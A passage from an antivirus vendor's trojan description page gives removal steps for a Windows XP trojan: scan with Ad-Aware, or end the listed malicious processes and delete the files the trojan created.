Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    sc.exe:612
    sc.exe:1572
    sc.exe:1776
    OneG2190828.exe:1548
    runonce.exe:340

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
    %System%\wbem\Logs (4 bytes)
    %WinDir%\inf\oem10.inf (4 bytes)
    %WinDir%\5717.mp4 (58 bytes)
    %WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
    %Documents and Settings%\All Users (4 bytes)
    C:\$Directory (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
    %System%\jsseting.data (16 bytes)
    %System%\config\SysEvent.Evt (168 bytes)
    %Program Files%\RAV\CCtest.inf (4 bytes)
    C:\PROGRAM FILES (96 bytes)
    %Program Files%\RAV\CCtest.sys (7 bytes)
    %System%\drivers\pcidump.sys (11 bytes)
    %WinDir%\inf\oem10.PNF (18746 bytes)
    %Program Files%\RAV\CCtest.dll (10 bytes)
    %WinDir%\setupapi.log (32472 bytes)
    %System%\drivers\SET41.tmp (7 bytes)
    %Documents and Settings%\%current user%\Cookies (96 bytes)
    %System%\Rwmltcy.cc3 (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
